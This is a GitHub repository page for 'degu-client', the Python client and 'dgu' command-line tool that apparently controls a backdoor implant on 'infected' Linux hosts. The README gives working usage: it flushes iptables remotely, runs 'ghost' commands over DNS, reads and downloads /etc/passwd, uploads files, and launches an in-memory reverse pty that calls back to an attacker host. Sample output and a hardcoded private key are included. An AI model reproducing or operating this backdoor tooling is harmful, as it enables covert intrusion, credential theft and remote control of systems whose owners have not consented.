Skip to content

io-tl/degu-client

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
examples/ssh
examples/ssh
 
 
html
html
 
 
.gitignore
.gitignore
 
 
README.md
README.md
 
 
degu.py
degu.py
 
 
dgu
dgu
 
 
sample.py
sample.py
 
 

Repository files navigation

degu-client

degu client part

Python API is still in early dev, library use std python3 lib, but dgu utility use docopt module ( pip install docopt )

Main API

degu.py is the python module to interact with degu.so. Some examples You can use main api :

#!/usr/bin/env python
import degu
import time

PRIVATE_KEY="f82876e92eaadc0702c16e7deca02ffe25116e84c8ba1e9ebb7423446dbae0534700b14ed3e531a3bc90f852b812df7d79e55190f60c9f2dc6fc0dc67aed0e92"

d = degu.degu("192.168.0.39",priv=PRIVATE_KEY)
d.ghost_exec(b"iptables -P INPUT ACCEPT")
d.ghost_exec(b"iptables -F")

d.knock(b":2222")
time.sleep(2)
aa=d.download(b"/etc/passwd")
print(aa)

d.knock(b":2222")
time.sleep(2)
aa=d.upload(b"/tmp/a",b"/tmp/pwned")

d.knock(b":2222")
time.sleep(2)
aa=d.mem_exec("../helper/cb",b"DEGU 192.168.0.39 11111 ")

dgu utility

Usage:
    dgu bind  <rhost> <rport>         read     <rfile>
    dgu bind  <rhost> <rport>         download <rfile> <lfile>
    dgu bind  <rhost> <rport>         upload   <lfile> <rfile>
    dgu bind  <rhost> <rport>         exe      <lfile> <parameters>
    dgu cb    <rhost> <lhost> <lport> read     <rfile>
    dgu cb    <rhost> <lhost> <lport> download <rfile> <lfile>
    dgu cb    <rhost> <lhost> <lport> upload   <lfile> <rfile>
    dgu cb    <rhost> <lhost> <lport> exe      <lfile> <parameters>
    dgu ghost <rhost> <cmd>
    dgu keygen
    dgu getpub

Examples:

    Upload local /tmp/dd file to remote /tmp/upped on degu infected
    host 192.168.0.49, asking him to open 12345 for bind connect :

$ dgu bind 192.168.0.49 12345 upload /tmp/dd /tmp/upped
[    INFO  14:11.57][degu ]: trying remote bind on 192.168.0.49:12345
[    INFO  14:11.59][degu ]: uploaded /tmp/dd on 192.168.0.49:12345:/tmp/upped

    Read remote /etc/passwd file, asking degu to wait on port 9991 for connection :

$ dgu bind 192.168.0.49 9991 read /etc/passwd
[    INFO  14:11.15][degu ]: trying remote bind on 192.168.0.49:9991
[    INFO  14:11.17][degu ]: downloading b'/etc/passwd'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...

    Execute reverse pty on lhost 192.168.0.15:11111 using cb ( don't forget arg0 !)
on attacker console :

$ dgu bind 192.168.0.49 12311 exe helpers/cb "MYPROC 192.168.0.15 11111"
[    INFO  14:51.00][degu ]: trying remote bind on 192.168.0.49:12311
[    INFO  14:51.03][degu ]: send bin ok
[    INFO  14:51.03][degu ]: launch exe helpers/cb on 192.168.0.49

Execute over unfiltered dns

$ dgu ghost 192.168.0.49 "touch /tmp/pwneeee"
[    INFO  18:58.45][degu ]: ghost executing b'touch /tmp/pwneeee'
[   DEBUG  18:58.45][degu ]: executing : b'touch /tmp/pwneeee'

About

degu client part

Resources

Readme
Activity

Stars

6 stars

Watchers

2 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

 
 
 

Languages